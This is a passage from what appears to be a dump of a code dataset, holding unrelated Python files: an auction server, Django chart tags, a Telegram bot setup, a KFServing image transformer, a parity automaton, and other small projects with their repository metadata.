1].values[0]\n","repo_name":"gbvolkov/statements_recognition","sub_path":"BankStatement_21_process.py","file_name":"BankStatement_21_process.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40480272701","text":"from agents import get_available_agent, submit_agents\nfrom typing import Dict, List\n\n\ndef orchestrate_agent_tasks(agents: List[str], assignments: Dict[str, List[str]]) -> Dict[str, List[str]]:\n \"\"\"\n Orchestrates the agents' tasks by submitting each task to a free agent.\n Waits for each agent to complete each of its tasks.\n Returns a dictionary of results.\n \"\"\"\n results = {}\n tasks = [task for _, tasks_list in assignments.items() for task in tasks_list]\n remaining_tasks = tasks\n pending_tasks = tasks\n\n while pending_tasks:\n for agent in agents:\n if not pending_tasks:\n break\n if agent not in get_available_agent():\n continue\n submitted_task = submit_agents(remaining_tasks[:1], agent)[0]\n remaining_tasks = remaining_tasks[1:]\n pending_tasks = [task for task in pending_tasks if task != submitted_task]\n\n for agent in agents:\n results[agent] = submit_agents([], agent)\n\n return results","repo_name":"beyond-repair/My-mind-A.I.","sub_path":"orchestrate_agent_tasks.py","file_name":"orchestrate_agent_tasks.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1083361045","text":"from aiohttp.web import run_app\nfrom aiohttp.web import get\nfrom aiohttp import web\n\nimport pathlib\nimport os\nimport signal\nfrom copy import deepcopy\nimport asyncio\n\nfrom auction_server.auction_processor import AuctionProcessor\nfrom auction_server.server_message_processor import ServerMessageProcessor\nfrom auction_server.server_main_data import ServerMainData\nfrom auction_server.auction_server_handler import HandleLoadAuction\nfrom auction_server.auction_server_handler import HandleLoadResourcesFromFile\nfrom auction_server.auction_server_handler import HandleClientTearDown\nfrom auction_server.auction_session import AuctionSession\nfrom auction_server.server_message_processor import ClientConnectionState\n\n\nfrom foundation.agent import Agent\nfrom foundation.auction_manager import AuctionManager\nfrom foundation.session_manager import SessionManager\nfrom foundation.resource_manager import ResourceManager\nfrom foundation.database_manager import DataBaseManager\nfrom foundation.bidding_object_manager import BiddingObjectManager\nfrom foundation.config import Config\n\nfrom utils.auction_utils import log\n\nclass AuctionServer(Agent):\n\n def __init__(self):\n try:\n super(AuctionServer, self).__init__('auction_server.yaml')\n\n self.logger.debug('Startig init')\n\n self._initialize_managers()\n self._initilize_processors()\n\n self._load_resources()\n self._load_auctions()\n\n # add routers.\n self.app.add_routes([get('/websockets', self.message_processor.handle_web_socket)])\n\n self.app.on_shutdown.append(self.on_shutdown)\n self.app.on_startup.append(self.on_startup)\n self.logger.debug('ending init')\n\n except Exception as e:\n self.logger.error(\"Error during server initialization - message:\", str(e))\n\n async def on_startup(self, app):\n \"\"\"\n Connects to the database,\n :param app: application connecting the database\n :return:\n \"\"\"\n self.logger.debug(\"Starting On startup\")\n await self.database_manager.connect()\n self.logger.debug(\"Ending On startup\")\n\n async def terminate(self, request):\n \"\"\"\n Terminate server execution\n :return:\n \"\"\"\n print('Send signal termination')\n os.kill(os.getpid(), signal.SIGINT)\n return web.Response(text=\"Terminate started\")\n\n async def on_shutdown(self, app):\n \"\"\"\n Close all open connections\n :param app:\n :return:\n \"\"\"\n self.logger.debug(\"starting shutdown\")\n session_keys = deepcopy(self.session_manager.get_session_keys())\n\n for session_key in session_keys:\n session: AuctionSession = self.session_manager.get_session(session_key)\n handle_client_teardown = HandleClientTearDown(session)\n await handle_client_teardown.start()\n\n self.logger.debug(\"before client process disconnect\")\n # disconnects the client\n await self.message_processor.process_disconnect(session)\n self.logger.debug(\"end client process disconnect\")\n\n self.logger.debug(\"After sending auction sessions teardown\")\n\n # Wait while there are still open connections\n while True:\n await asyncio.sleep(1)\n\n num_open = 0\n for session in self.session_manager.session_objects.values():\n if session.connection.get_state() != ClientConnectionState.CLOSED:\n num_open = num_open + 1\n\n if num_open == 0:\n break\n\n # remove auctions and their processes\n await self.remove_auctions()\n\n try:\n await self.database_manager.close()\n except ValueError:\n pass\n\n self.logger.info(\"shutdown ends\")\n\n async def remove_auctions(self):\n \"\"\"\n Removes auctions and their related objects as part of the shutdown process\n :return:\n \"\"\"\n self.logger.debug(\"Starting remove auctions\")\n\n keys = self.auction_manager.get_auctioning_object_keys()\n for key in keys:\n auction = self.auction_manager.get_auction(key)\n self.auction_processor.delete_auction(auction)\n await auction.stop_tasks()\n self.auction_manager.delete_auction(key)\n\n self.logger.debug(\"ending remove auctions\")\n\n def _load_main_data(self):\n \"\"\"\n Sets the main data defined in the configuration file\n \"\"\"\n self.logger.debug(\"Starting _load_main_data\")\n self.server_data = ServerMainData()\n self.logger.debug(\"Ending _load_main_data\")\n\n def _initialize_managers(self):\n \"\"\"\n Initializes managers used.\n :return:\n \"\"\"\n self.logger.debug(\"Starting _initialize_managers\")\n self.auction_manager = AuctionManager(self.domain)\n self.database_manager = DataBaseManager(Config().get_config_param('DataBase', 'Type'),\n Config().get_config_param('DataBase', 'Host'),\n Config().get_config_param('DataBase', 'User'),\n Config().get_config_param('DataBase', 'Password'),\n Config().get_config_param('DataBase', 'Port'),\n Config().get_config_param('DataBase', 'DbName'),\n Config().get_config_param('DataBase', 'MinSize'),\n Config().get_config_param('DataBase', 'MaxSize'))\n self.bidding_object_manager = BiddingObjectManager(self.domain)\n self.session_manager = SessionManager()\n self.resource_manager = ResourceManager(self.domain)\n self.logger.info(\"database object created: {0}\".format(id(self.database_manager)))\n self.logger.debug(\"Ending _initialize_managers\")\n\n def _initilize_processors(self):\n \"\"\"\n Initialize processors used\n :return:\n \"\"\"\n self.logger.debug(\"Starting _initilize_processors\")\n module_directory = Config().get_config_param('AUMProcessor', 'ModuleDir')\n self.auction_processor = AuctionProcessor(self.domain, module_directory)\n self.message_processor = ServerMessageProcessor()\n self.logger.debug(\"Ending _initilize_processors\")\n\n def _load_resources(self):\n \"\"\"\n Loads resources from file\n :return:\n \"\"\"\n self.logger.debug(\"Starting _load_resources\")\n\n try:\n resource_file = Config().get_config_param('Main', 'ResourceFile')\n base_dir = pathlib.Path(__file__).parent.parent\n resource_file = base_dir / 'config' / resource_file\n handle = HandleLoadResourcesFromFile(resource_file, 0)\n handle.start()\n except Exception as e:\n self.logger.error(\"An error occours during load resource\", str(e))\n self.logger.debug(\"Ending _load_resources\")\n\n def _load_auctions(self):\n \"\"\"\n Loads auctions from file\n :return:\n \"\"\"\n self.logger.debug(\"Starting _load_auctions\")\n auction_file = Config().get_config_param('Main', 'AuctionFile')\n base_dir = pathlib.Path(__file__).parent.parent\n auction_file = base_dir / 'xmls' / auction_file\n auction_file = str(auction_file)\n handle = HandleLoadAuction(auction_file, 0)\n handle.start()\n self.logger.debug(\"Ending _load_auctions\")\n\n def run(self):\n \"\"\"\n Runs the application.\n :return:\n \"\"\"\n if self.server_data.use_ipv6:\n run_app(self.app, host=str(self.server_data.ip_address6), port=self.server_data.local_port)\n else:\n run_app(self.app, host=str(self.server_data.ip_address4), port=self.server_data.local_port)\n","repo_name":"lmarent/Auction_Engine","sub_path":"auction/auction_server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6784089830","text":"from django import template\nfrom django.db.models import Count, Sum\n\nfrom classytags.helpers import AsTag\nimport pandas as pd\n\nfrom metrics.base.templatetags.metrics_tags import ChartMixin, MetricTotalTag\nfrom metrics.charts import vertical_bar, make_chart_name\nfrom ..models import MoodChange, MoodCount\n\nregister = template.Library()\n\n\nclass MoodsMixin(object):\n\n def find_moods_difference(self, records, mood_type):\n \"\"\"\n Find the difference in recorded moods on entering or leaving the \n garden.\n \"\"\"\n moodcounts = MoodCount.objects.filter(\n mood_change__in=records,\n mood__type=mood_type,\n )\n chart_counts = []\n for mood in list(set(moodcounts.values_list('mood__name', flat=True))):\n mood_in = moodcounts.filter(counted_time='in', mood__name=mood) \\\n .aggregate(s=Sum('count'))['s']\n mood_out = moodcounts.filter(counted_time='out', mood__name=mood) \\\n .aggregate(s=Sum('count'))['s']\n chart_counts.append({\n 'mood': mood,\n 'change': mood_out - mood_in,\n })\n return chart_counts\n\n\nclass MoodsPositiveChart(MoodsMixin, ChartMixin, AsTag):\n def get_metric_model(self):\n return MoodChange\n\n def get_chart(self, records, garden):\n chart_counts = self.find_moods_difference(records, 'positive')\n df = pd.DataFrame.from_records(chart_counts, coerce_float=True)\n return vertical_bar(df.groupby('mood').sum()['change'],\n make_chart_name('moods_positive', garden),\n ylabel='CHANGE IN POSITIVE MOODS', shape='short')\n\n\nclass MoodsNegativeChart(MoodsMixin, ChartMixin, AsTag):\n def get_metric_model(self):\n return MoodChange\n\n def get_chart(self, records, garden):\n chart_counts = self.find_moods_difference(records, 'negative')\n df = pd.DataFrame.from_records(chart_counts, coerce_float=True)\n return vertical_bar(df.groupby('mood').sum()['change'],\n make_chart_name('moods_negative', garden),\n ylabel='CHANGE IN NEGATIVE MOODS', shape='short')\n\n\nclass MoodsTotal(MetricTotalTag):\n def get_metric_model(self):\n return MoodChange\n\n def get_value(self, context, garden, year, start, end):\n kwargs = self.args_to_dict(garden, year, start, end)\n records = self.get_records(**kwargs)\n return records.aggregate(total=Count('pk'))['total']\n\n\nregister.tag(MoodsPositiveChart)\nregister.tag(MoodsNegativeChart)\nregister.tag(MoodsTotal)\n","repo_name":"ebrelsford/Farming-Concrete","sub_path":"barn/metrics/moods/templatetags/moods_tags.py","file_name":"moods_tags.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"37269722725","text":"import tkinter as tk\nfrom control_admin import Login\n\nfrom PIL import ImageTk\nfrom PIL import Image\n\nclass HomePage(tk.Toplevel):\n\n def __init__(self, master, *args, **kw):\n tk.Toplevel.__init__(self, master)\n\n self.resizable(width=False, height=False)\n self.title('Vem de Van')\n self.iconbitmap('img/favicon.ico')\n\n self.geometry(f\"360x640+{master.width - 180}+{master.height - 350}\")\n\n self.master = master\n \n self.imgSplashScreenOriginal = Image.open('img/splash_screen.png')\n self.imgSplashScreenResize = self.imgSplashScreenOriginal.resize((360, 640), Image.ANTIALIAS)\n \n self.imgSplashScreen = ImageTk.PhotoImage(self.imgSplashScreenResize)\n\n self.imgSplashScreenLabel = tk.Label(self, image=self.imgSplashScreen)\n self.imgSplashScreenLabel.place(x=0, y=0)\n\n\n self.button = tk.Button(self, text=\"Abrir Painel de Controle\", command=lambda : master.changeScreen(Login(master)))\n self.button.place(x=110, y=50)\n","repo_name":"xTudoS/VemDeVan","sub_path":"home_page.py","file_name":"home_page.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37669671750","text":"from langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores import Chroma\nfrom langchain.document_loaders import TextLoader\nfrom langchain.document_loaders import DirectoryLoader\nimport os\n\n\n# 用文件夹里的txt文件生成长期记忆库\ndef generate_character_feature_chats(character_name: str):\n loader = DirectoryLoader(f\"src/settings/featured_chats/{character_name}\", glob=\"*.txt\", show_progress=True,\n use_multithreading=True, loader_cls=TextLoader, loader_kwargs={'autodetect_encoding': True})\n documents = loader.load()\n\n text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n docs = text_splitter.split_documents(documents)\n print(f\"Split {len(documents)} documents into {len(docs)} chunks.\")\n for i in range(len(docs)):\n print(docs[i].page_content)\n\n # 保存embedding到db文件夹下\n persist_directory = f'vectorDB/{character_name}'\n\n # 如果没有db文件夹,就创建一个\n if not os.path.exists(persist_directory):\n os.makedirs(persist_directory)\n\n huggingfaceModel = \"moka-ai/m3e-base\"\n embeddings = HuggingFaceEmbeddings(model_name=huggingfaceModel)\n\n vectordb = Chroma.from_documents(\n documents=docs, embedding=embeddings, persist_directory=persist_directory)\n # 使用vectordb持久化,也就是保存到db文件夹下\n vectordb.persist()\n vectordb = None\n\n\nif __name__ == \"__main__\":\n characters = ['凉宫春日', '神里绫华', '韦小宝']\n for character in characters:\n generate_character_feature_chats(character)\n","repo_name":"highmore9501/LangChainTest","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6118500527","text":"import logging\nfrom os import getenv\nimport telebot\nfrom dotenv import load_dotenv\nfrom datetime import datetime \nfrom platform import system, release\nfrom socket import gethostname, gethostbyname\nimport json\n\nload_dotenv('./config.env')\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n handlers=[\n logging.FileHandler(f'./logs/catfinder_{datetime.date(datetime.now())}.log'),\n logging.StreamHandler()\n ]\n)\n\nLOGGER = logging.getLogger(__name__)\n\nLOGGER.info('Starting bot')\n\nTOKEN = getenv('TOKEN')\nOWNER = getenv('OWNER')\nMODEL_PATH = getenv('MODEL_PATH')\nCLASSES_PATH = getenv('CLASSES_PATH')\nLOGGER.info(f'{MODEL_PATH}')\nLOGGER.info(f'{CLASSES_PATH}')\n\nwith open(CLASSES_PATH, 'r') as f:\n CLASSES = json.load(f)\n\nip_addr = gethostbyname(gethostname())\n\nbot = telebot.TeleBot(TOKEN)\nbot.send_message(OWNER, f'{datetime.now()} \\n{system()} {release()} \\nIP: {ip_addr}')\n\nLOGGER.info(f'Initialized {system()} {release()} IP: {ip_addr}')","repo_name":"zeinovich/catfinder","sub_path":"bot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74412379685","text":"import argparse\nimport base64\nimport io\nimport logging\nfrom typing import Dict\n\nimport kfserving\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nfrom PIL import Image\n\nlogging.basicConfig(level=kfserving.constants.KFSERVING_LOGLEVEL)\n\ntransform = transforms.Compose([\n transforms.Resize(32),\n transforms.CenterCrop(32),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n\ndef image_transform(instance):\n byte_array = base64.b64decode(instance['image']['b64'])\n image = Image.open(io.BytesIO(byte_array))\n im = Image.fromarray(np.asarray(image))\n res = transform(im)\n logging.info(res)\n return res.tolist()\n\n\nCLASSES = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n\n\ndef top_5(prediction):\n pred = torch.as_tensor(prediction)\n scores = torch.nn.functional.softmax(pred, dim=0)\n\n _, top_5 = torch.topk(pred, 5)\n\n results = {}\n for idx in top_5:\n results[CLASSES[idx]] = scores[idx].item()\n\n return results\n\n\nclass ImageTransformer(kfserving.KFModel):\n def __init__(self, name: str, predictor_host: str):\n super().__init__(name)\n self.predictor_host = predictor_host\n\n def preprocess(self, inputs: Dict) -> Dict:\n return {'instances': [image_transform(instance) for instance in inputs['instances']]}\n\n def postprocess(self, inputs: Dict) -> Dict:\n return {'predictions': [top_5(prediction) for prediction in inputs['predictions']]}\n\n\nif __name__ == \"__main__\":\n DEFAULT_MODEL_NAME = \"model\"\n\n parser = argparse.ArgumentParser(parents=[kfserving.kfserver.parser])\n parser.add_argument('--model_name', default=DEFAULT_MODEL_NAME,\n help='The name that the model is served under.')\n parser.add_argument('--predictor_host', help='The URL for the model predict function', required=True)\n\n args, _ = parser.parse_known_args()\n\n transformer = ImageTransformer(args.model_name, predictor_host=args.predictor_host)\n kfserver = kfserving.KFServer()\n kfserver.start(models=[transformer])","repo_name":"kangwoo/kubeflow-introduction","sub_path":"09-serving/kfserving/transformer/image_transformer.py","file_name":"image_transformer.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8570857765","text":"import numpy as np\n\nfrom pypulseq.calc_duration import calc_duration\n\n\ndef align(*args) -> list:\n \"\"\"\n Aligns `SimpleNamespace` blocks as per specified alignment options by setting delays of the pulse sequence events\n within the block. All previously configured delays within objects are taken into account during calculating of the\n block duration but then reset according to the selected alignment. Possible values for align_spec are 'left',\n 'center', 'right'.\n\n Parameters\n ----------\n args : list\n List of alignment options and `SimpleNamespace` blocks.\n Template: [alignment_spec, 'SimpleNamespace` block, [alignment_spec, `SimpleNamespace` block, ...]].\n Alignment spec can be one of `left`, `center` or `right`.\n\n Returns\n -------\n objects : list\n List of aligned `SimpleNamespace` blocks.\n \"\"\"\n alignment_options = ['left', 'center', 'right']\n if not isinstance(args[0], str):\n raise ValueError('First parameter must be of type str.')\n\n curr_align = alignment_options.index(args[0]) if args[0] in alignment_options else None\n\n i_objects = []\n alignments = []\n for i in range(1, len(args)):\n if curr_align is None:\n raise ValueError('Invalid alignment spec.')\n if isinstance(args[i], str):\n curr_align = alignment_options.index(args[i]) if args[i] in alignment_options else None\n continue\n i_objects.append(i)\n alignments.append(curr_align)\n\n args = np.array(args)\n objects = args[i_objects]\n dur = calc_duration(*objects)\n\n for i in range(len(objects)):\n if alignments[i] == 0:\n objects[i].delay = 0\n elif alignments[i] == 1:\n objects[i].delay = (dur - calc_duration(objects[i])) / 2\n elif alignments[i] == 2:\n objects[i].delay = dur - calc_duration(objects[i]) + objects[i].delay\n\n return objects\n","repo_name":"skye789/MRI-Sequence-Programming","sub_path":"MRTwin_pulseq-exercise/code/scannerloop_libs/pypulseq/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25423148250","text":"import csv\nimport matplotlib.pyplot as plt\n\nages=[]\n\nwith open('preprocessed.csv', mode='r') as csv_file:\n csv_reader = csv.reader(csv_file)\n next(csv_reader)\n for line in csv_reader:\n if line[0]==\"NA\":\n next(csv_reader)\n else:\n ages.append(int(line[0]))\n\nrange = (0,100)\nbins=10\n\nplt.hist(ages, bins, range, color = '#3fbf4f', histtype = 'bar', edgecolor='black') \nplt.xlabel('Ages') \nplt.ylabel('No. of people') \nplt.title('Age Distribution') \n\nplt.show()","repo_name":"archit-47/Predicting-Chronic-Kidney-Diseases","sub_path":"Plots and Graphs/Age Distribution.py","file_name":"Age Distribution.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18551459768","text":"# IPN - Escuela Superior de Computación\r\n# Autor: Jimenez Luna Rodrigo Efren\r\n# Grupo: 4CM2\r\n\r\nimport random\r\nimport os\r\nimport time\r\nimport graphviz\r\nfrom tqdm import tqdm\r\n\r\n# Automata que comprueba si la cadena cumple con la paridad\r\n###############################\r\ndef parity_DFA():\r\n string = \"\"\r\n state = \"q0\"\r\n\r\n for i in range(8):\r\n c = str(random.getrandbits(1))\r\n string += c\r\n\r\n if state == \"q0\":\r\n if c == \"1\":\r\n state = \"q1\"\r\n else:\r\n state = \"q3\"\r\n elif state == \"q1\":\r\n if c == \"1\":\r\n state = \"q0\"\r\n else:\r\n state = \"q2\"\r\n elif state == \"q2\":\r\n if c == \"1\":\r\n state = \"q3\"\r\n else:\r\n state = \"q1\"\r\n elif state == \"q3\":\r\n if c == \"1\":\r\n state = \"q2\"\r\n else:\r\n state = \"q0\"\r\n\r\n if state == \"q0\":\r\n return True, string\r\n else:\r\n return False, string\r\n###############################\r\n\r\n# Inicia el procotolo ya sea encendido o apagado de forma aleatoria\r\ndef start_protocol():\r\n state = random.getrandbits(1)\r\n executions = 0\r\n\r\n if state == 0:\r\n os.system(\"clear\")\r\n print(\"El protocolo se encuentra apagado.\\n\".format(executions))\r\n return\r\n\r\n while state:\r\n state = random.getrandbits(1)\r\n\r\n os.system(\"clear\")\r\n print(\"Generando cadenas\\n\")\r\n time.sleep(1)\r\n os.system(\"clear\")\r\n print(\"Generando cadenas.\\n\")\r\n time.sleep(1)\r\n os.system(\"clear\")\r\n print(\"Generando cadenas..\\n\")\r\n time.sleep(1)\r\n os.system(\"clear\")\r\n print(\"Generando cadenas...\\n\")\r\n\r\n print(\"Iniciando analisis de cadenas:\\n\")\r\n\r\n strings_file = open(\"strings.txt\", \"a+\")\r\n accepted_file = open(\"approved_strings.txt\", \"a+\")\r\n rejected_file = open(\"rejected_strings.txt\", \"a+\")\r\n\r\n # Ejecuta el AFD de paridad para las 10^6 cadenas binarias\r\n for i in tqdm(range(10)):\r\n result, string = parity_DFA()\r\n\r\n strings_file.write(string + \"\\n\")\r\n\r\n if result:\r\n accepted_file.write(string + \"\\n\")\r\n else:\r\n rejected_file.write(string + \"\\n\")\r\n \r\n accepted_file.close()\r\n rejected_file.close()\r\n strings_file.close()\r\n\r\n executions += 1\r\n\r\n os.system(\"clear\")\r\n print(\"El protocolo se ejecuto {} veces, ahora se encuentra apagado.\\n\".format(executions))\r\n\r\ndef show_automata():\r\n os.system(\"clear\")\r\n\r\n DFA_graph = graphviz.Digraph('AFD de Paridad')\r\n DFA_graph.attr(rankdir='LR')\r\n\r\n # Inicia diagrama del protocolo\r\n DFA_graph.attr('node', shape='circle')\r\n DFA_graph.node('Listo')\r\n\r\n DFA_graph.attr('node', shape='plaintext')\r\n DFA_graph.edge('', 'Listo', label='Inicio')\r\n\r\n DFA_graph.attr('node', shape='circle')\r\n DFA_graph.edge('Listo', 'Enviar', label='Entrada de cadena')\r\n DFA_graph.edge('Enviar', 'Enviar', label='Espera 3 segundos')\r\n DFA_graph.edge('Enviar', 'Paridad', label='')\r\n DFA_graph.edge('Paridad', 'Listo', label='')\r\n\r\n # Inicia diagrama del AFD\r\n DFA_graph.attr('node', shape='doublecircle')\r\n DFA_graph.node('Q0')\r\n DFA_graph.node('Paridad')\r\n\r\n DFA_graph.attr('node', shape='plaintext')\r\n DFA_graph.edge('', 'Q0', label='Paridad')\r\n\r\n DFA_graph.attr('node', shape='circle')\r\n DFA_graph.edge('Q0', 'Q1', label='1')\r\n DFA_graph.edge('Q0', 'Q3', label='0')\r\n DFA_graph.edge('Q1', 'Q0', label='1')\r\n DFA_graph.edge('Q1', 'Q2', label='0')\r\n DFA_graph.edge('Q2', 'Q1', label='0')\r\n DFA_graph.edge('Q2', 'Q3', label='1')\r\n DFA_graph.edge('Q3', 'Q2', label='1')\r\n DFA_graph.edge('Q3', 'Q0', label='0')\r\n\r\n DFA_graph.render('Automata', view=True)\r\n","repo_name":"Efren0406/TC","sub_path":"Practica 3 AFD/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8174680038","text":"from ycappuccino.core.models.decorators import Item, Property, Empty, Reference, ItemReference\nfrom ycappuccino.storage.models.model import Model\nimport os\nfrom ycappuccino.core.decorator_app import App\n\n@Empty()\ndef empty():\n _empty = Measure()\n _empty.id(\"client_pyscript_core\")\n _empty.name(\"client_pyscript_core\")\n return _empty\n\n@App(name=\"ycappuccino.iot\")\n@Item(collection=\"measures\",name=\"measure\", plural=\"measures\", secure_write=True, secure_read=True)\n@ItemReference(from_name=\"measure\", field=\"sensor\", item=\"sensor\")\nclass Measure(Model):\n def __init__(self, a_dict=None):\n super().__init__(a_dict)\n self._name = None\n self._sensor = None\n self._val = None\n self._ts = None\n\n\n @Property(name=\"name\")\n def name(self, a_value):\n self._name = a_value\n\n @Reference(name=\"sensor\")\n def sensor(self, a_value):\n self._sensor = a_value\n\n @Property(name=\"val\")\n def val(self, a_value):\n self._val = a_value\n @Reference(name=\"ts\")\n def ts(self, a_value):\n self._ts = a_value\n\n\n\n\nempty()","repo_name":"pisua/ycappuccino-core","sub_path":"iot/models/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"6139780942","text":"# _*_ codign:utf8 _*_\n\"\"\"====================================\n@Author:Sadam·Sadik\n@Email:1903249375@qq.com\n@Date:2022/7/28\n@Software: PyCharm\n@disc:\n=======================================\"\"\"\nimport json\n\nfrom django.http import HttpResponse\nfrom rest_framework import views\n\nfrom izBasar import esClient\n\nINDEX_DEVICES = \"devices\"\n\n\nclass DeviceRegionView(views.View):\n def get(self, request):\n result = []\n resp = esClient.search(index=INDEX_DEVICES, size=0, aggs={\n \"country\": {\n \"terms\": {\n \"field\": \"geoinfo.country.code.keyword\",\n \"size\": 1000\n }\n }\n })\n countryBuckets: list[dict] = resp.get(\"aggregations\").get(\"country\").get(\"buckets\")\n for countryBucket in countryBuckets:\n countryCode = countryBucket.get(\"key\")\n resp1 = esClient.search(index=INDEX_DEVICES, size=1, query={\n \"term\": {\n \"geoinfo.country.code.keyword\": {\n \"value\": countryCode\n }\n }\n }, aggs={\n \"subDivisions\": {\n \"terms\": {\n \"field\": \"geoinfo.subdivisions.names.en.keyword\",\n \"size\": 2000\n }\n }\n })\n country: dict = resp1.get(\"hits\").get(\"hits\")[0].get(\"_source\").get(\"geoinfo\").get(\"country\")\n country.setdefault(\"doc_count\", countryBucket.get(\"doc_count\"))\n subDivisions: list[dict] = []\n subDivisionBuckets: list[dict] = resp1.get(\"aggregations\").get(\"subDivisions\").get(\"buckets\")\n for subDivisionBucket in subDivisionBuckets:\n subDivisionNameEn = subDivisionBucket.get(\"key\")\n if subDivisionNameEn == \"\":\n continue\n resp2 = esClient.search(index=INDEX_DEVICES, size=1, query={\n \"bool\": {\n \"must\": [\n {\n \"term\": {\n \"geoinfo.country.code.keyword\": {\n \"value\": countryCode\n }\n }\n },\n {\n \"term\": {\n \"geoinfo.subdivisions.names.en.keyword\": {\n \"value\": subDivisionNameEn\n }\n }\n }\n ]\n }\n }, aggs={\n \"city\": {\n \"terms\": {\n \"field\": \"geoinfo.city.names.en.keyword\",\n \"size\": 2000\n }\n }\n })\n subDivision: dict = resp2.get(\"hits\").get(\"hits\")[0].get(\"_source\").get(\"geoinfo\").get(\"subdivisions\")\n subDivision.setdefault(\"doc_count\", subDivisionBucket.get(\"doc_count\"))\n # TODO:统计城市City的数量\n cities: list[dict] = []\n cityBuckets: list[dict] = resp2.get(\"aggregations\").get(\"city\").get(\"buckets\")\n for cityBucket in cityBuckets:\n cityNameEn = cityBucket.get(\"key\")\n if cityNameEn == \"\":\n continue\n resp3 = esClient.search(index=INDEX_DEVICES, size=1, query={\n \"bool\": {\n \"must\": [\n {\n \"term\": {\n \"geoinfo.country.code.keyword\": {\n \"value\": countryCode\n }\n }\n },\n {\n \"term\": {\n \"geoinfo.subdivisions.names.en.keyword\": {\n \"value\": subDivisionNameEn\n }\n }\n }, {\n \"term\": {\n \"geoinfo.city.names.en.keyword\": {\n \"value\": cityNameEn\n }\n }\n }\n ]\n }\n })\n city: dict = resp3.get(\"hits\").get(\"hits\")[0].get(\"_source\").get(\"geoinfo\").get(\"city\")\n city.setdefault(\"doc_count\", cityBucket.get(\"doc_count\"))\n cities.append(city)\n subDivision.setdefault(\"children\", cities)\n subDivisions.append(subDivision)\n country.setdefault(\"children\", subDivisions)\n result.append(country)\n return HttpResponse(json.dumps(result, ensure_ascii=False), headers={\"content-type\": \"application/json\"})\n\n\nclass DeviceView(views.View):\n def get(self, request):\n resp = esClient.search(index=INDEX_DEVICES)\n return HttpResponse(json.dumps(resp, ensure_ascii=False), headers={\"content-type\": \"application/json\"})\n","repo_name":"Haoke98/AllKeeper","sub_path":"accountSystem/views/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27452890524","text":"import threading\n\nfrom ui_server import app, logger\nfrom mllpserver import MLLPServer, MLLPHandler\nfrom database import Database\nfrom config import Config\n\n\nif __name__ == '__main__':\n logger.debug('Database connecting...')\n Database.initialize(dsn=Config.DATABASE)\n logger.debug('Database connected...')\n t1 = threading.Thread(target=MLLPServer(Config.MLLP_ADDR, MLLPHandler).serve_forever, name='mllp', daemon=True)\n t2 = threading.Thread(target=app.run, kwargs={'host': '0.0.0.0'}, name='lis', daemon=True)\n logger.info('MLLP Server starting...')\n t1.start()\n logger.info('MLLP Server started in thread {}'.format(t1.name))\n logger.info('steveLIS Server starting...')\n t2.start()\n logger.info('steveLIS Server started in thread {}'.format(t2.name))\n t1.join()\n t2.join()\n","repo_name":"sjadczak/steveLIS","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73342175525","text":"\"\"\"\nDaily Coding Problem - 2019-03-07.\n\nGiven a list of numbers L, implement a method sum(i, j) which returns\nthe sum from the sublist L[i:j] (including i, excluding j).\n\nFor example, given L = [1, 2, 3, 4, 5], sum(1, 3) should return\nsum([2, 3]), which is 5.\n\nYou can assume that you can do some pre-processing. sum() should be\noptimized over the pre-processing step.\n\n\"\"\"\n\n\nclass SubListSum:\n \"\"\"Optimized sub list.\"\"\"\n\n def __init__(self, arr):\n \"\"\"Init.\"\"\"\n self.arr = arr\n total = 0\n self.runningSum = [total]\n for i in arr:\n total += i\n self.runningSum.append(total)\n\n def sum(self, i, j):\n \"\"\"Sum the sublist of arr from i (inc ) to j ( exc ).\"\"\"\n if i < 0 or len(self.arr) < j or j <= i:\n return None\n return self.runningSum[j] - self.runningSum[i]\n\n\nsls = SubListSum([1, 2, 3, 4, 5])\nassert (sls.sum(1, 3)) == 5\nassert (sls.sum(0, 